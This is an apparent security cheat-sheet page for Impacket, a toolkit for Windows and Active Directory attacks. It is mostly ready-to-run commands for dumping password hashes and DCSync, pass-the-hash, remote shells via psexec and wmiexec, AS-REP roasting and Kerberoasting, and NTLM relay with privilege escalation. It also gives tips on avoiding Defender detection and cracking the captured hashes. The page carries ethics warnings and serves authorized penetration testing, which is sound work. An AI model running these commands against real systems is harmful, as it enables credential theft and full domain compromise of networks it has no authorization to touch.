CyberCheatsheets

Impacket Cheat Sheet

Python toolkit for SMB, Kerberos, and Windows protocol attacks.

Active Directory & WindowsadkerberosrelaysecretssmbUpdated 2026-06-02

Overview

Impacket provides scripts used daily in AD testing: remote execution, hash extraction, Kerberoasting, and NTLM relay. Ethics: secretsdump, relay, and remote exec are destructive and logged—authorized lab or explicit pentest scope only. Never run relay or DCSync against systems you do not own or have written permission to test.

Install

sudo apt install impacket-scripts

or pip:

pip install impacket
impacket-secretsdump -h

Essential commands

List examples

ls /usr/share/doc/python3-impacket/examples/ 2>/dev/null
impacket-psexec -h

Common workflows

Remote (admin creds)

impacket-secretsdump corp.local/administrator:'Password1!'@10.10.10.10

Pass-the-hash

impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 corp.local/admin@10.10.10.10

Local SAM/SECURITY/SYSTEM offline

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

NTDS.dit offline

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

psexec — remote shell —

impacket-psexec corp.local/administrator:'Password1!'@10.10.10.10
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.10

wmiexec — WMI shell (often quieter) —

impacket-wmiexec corp.local/user:'Password1!'@10.10.10.10
impacket-wmiexec -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@10.10.10.10 'hostname'

GetNPUsers — AS-REP roast (no preauth) —

impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
impacket-GetNPUsers corp.local/user -no-pass -dc-ip 10.10.10.1

Listener on attacker (authorized lab!)

impacket-ntlmrelayx -t ldap://10.10.10.1 -smb2support --escalate-user lowpriv

Relay to SMB

impacket-ntlmrelayx -tf targets.txt -smb2support

With SOCKS / WebDAV (check version docs)

impacket-ntlmrelayx -t smb://10.10.10.20 -smb2support -socks

Other high-value scripts —

impacket-GetUserSPNs corp.local/user:'Pass' -dc-ip 10.10.10.1 -request
impacket-getTGT corp.local/user:'Pass'
impacket-getST -spn cifs/dc01.corp.local corp.local/user:'Pass'
impacket-smbclient corp.local/user:'Pass'@10.10.10.5

Flags: secretsdump.py

-just-dc-user krbtgt

DCSync one account

-just-dc

DCSync all domain hashes

-pwd-last-set

Show pwdLastSet when dumping

-outputfile out.txt

Write hashes to file

Flags: psexec.py / wmiexec.py

-codec cp850

Output encoding (psexec)

-target-ip 10.10.10.5

Connect by IP

-silentcommand

No echo of command output (wmiexec)

Flags: GetNPUsers.py

-no-pass

Do not ask for password (user list only)

-dc-ip 10.10.10.1

Domain controller IP

-request

Request TGTs for crackable AS-REP hashes

Flags: ntlmrelayx.py

-t smb://10.10.10.5

Relay target

--escalate-user

Attempt privilege escalation on relay

-smb2support

Use SMB2

Tips

  • Ethics: DCSync and relay can domain-compromise in minutes—get sign-off; disable IPv6 mitigations only in lab.
  • Use -k Kerberos when you have tickets; -no-pass with -hashes for PTH.
  • Defender sees 7045, 4624, and RPC patterns—prefer wmiexec/smbexec per opsec notes in scope.
  • After GetNPUsers / Kerberoast, crack with hashcat -m 18200 / -m 13100.

References

Chuletas relacionadas